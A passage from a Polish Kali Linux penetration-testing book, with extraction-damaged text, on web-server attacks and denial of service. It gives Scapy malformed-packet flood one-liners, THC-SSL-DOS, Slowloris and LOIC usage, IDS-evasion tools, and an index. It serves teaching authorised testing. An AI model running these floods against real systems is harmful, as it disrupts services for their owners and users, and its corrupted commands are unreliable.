ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom

Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie

fimap -u httpwwwthesecuritybloggercom

Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity

bloggercom jest odporna na tego typu ataki

Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

256

i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)

Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe

Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze

dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego

funkcjonowania

Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki

Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based

Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew

Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

257

Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych

Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu

W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux

Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej

THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

258

Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

